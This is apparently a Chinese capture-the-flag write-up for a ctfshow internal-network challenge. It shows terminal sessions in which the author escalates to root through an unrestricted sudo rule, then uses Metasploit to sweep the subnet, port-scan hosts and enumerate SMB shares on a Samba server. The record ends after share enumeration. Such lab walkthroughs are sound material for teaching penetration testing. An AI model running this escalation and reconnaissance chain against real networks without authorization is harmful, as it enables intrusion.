文件上传
web151
内网渗透
web859_有跳板机
使用给出的地址登陆攻击机, 收集到一些信息
$ id
uid=1000(ctfshow) gid=1000(ctfshow) groups=1000(ctfshow)
$ ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1450
inet 172.2.18.4 netmask 255.255.255.0 broadcast 172.2.18.255
ether 02:42:ac:02:12:04 txqueuelen 0 (Ethernet)
RX packets 1231 bytes 111019 (111.0 KB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 1323 bytes 170366 (170.3 KB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
loop txqueuelen 1000 (Local Loopback)
RX packets 0 bytes 0 (0.0 B)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 0 bytes 0 (0.0 B)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
收集信息
- 网段 : 172.2.18.4
- 是一个 docker 主机
用户 ctfshow 具有 SUDO 特权可以利用这个提权到 root
$ sudo -l
Matching Defaults entries for ctfshow on shell:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User ctfshow may run the following commands on shell:
(ALL : ALL) NOPASSWD: ALL
$ sudo /bin/bash -p
root@shell:/usr# id
uid=0(root) gid=0(root) groups=0(root)
随后切换到 root 目录发现一个 .msf4 内部提供的工具应该是 Metasploit , 先使用该工具扫描内网吧
信息收集
msf6 > use auxiliary/scanner/discovery/arp_swee
msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 172.2.18.4/24
msf6 auxiliary(scanner/discovery/arp_sweep) > run
SIOCSIFFLAGS: Operation not permitted
[+] 172.2.18.1 appears to be up (UNKNOWN).
[+] 172.2.18.2 appears to be up (UNKNOWN).
[+] 172.2.18.3 appears to be up (UNKNOWN).
[+] 172.2.18.5 appears to be up (UNKNOWN).
[+] 172.2.18.6 appears to be up (UNKNOWN).
[+] 172.2.18.7 appears to be up (UNKNOWN).
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf6 > use auxiliary/scanner/portscan/tcp
msf6 auxiliary(scanner/portscan/tcp) > set RHOSTS 172.2.18.1-7
msf6 auxiliary(scanner/portscan/tcp) > set PORTS 1-65535
msf6 auxiliary(scanner/portscan/tcp) > set THREADS 10
msf6 auxiliary(scanner/portscan/tcp) >run
[+] 172.2.18.2: - 172.2.18.2:7400 - TCP OPEN
[+] 172.2.18.5: - 172.2.18.5:80 - TCP OPEN
[+] 172.2.18.5: - 172.2.18.5:9000 - TCP OPEN
[+] 172.2.18.6: - 172.2.18.6:139 - TCP OPEN
[+] 172.2.18.6: - 172.2.18.6:445 - TCP OPEN
信息收集
- 172.2.18.1
- 172.2.18.2 : 7400
- 172.2.18.3
- 172.2.18.5 : 80
- 172.2.18.6 : 139 445
- 172.2.18.7
msf6 > use auxiliary/scanner/smb/smb_enumshare
msf6 auxiliary(scanner/smb/smb_enumshares) > set rhosts 172.2.18.6
msf6 auxiliary(scanner/smb/smb_enumshares) > run
[*] 172.2.18.6:139 - Starting module
[+] 172.2.18.6:139 - myshare - (DISK) smb share test
[+] 172.2.18.6:139 - IPC$ - (IPC|SPECIAL) IPC Service (Samba Server Version 4.6.3)
[*] 172.2.18.6: - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed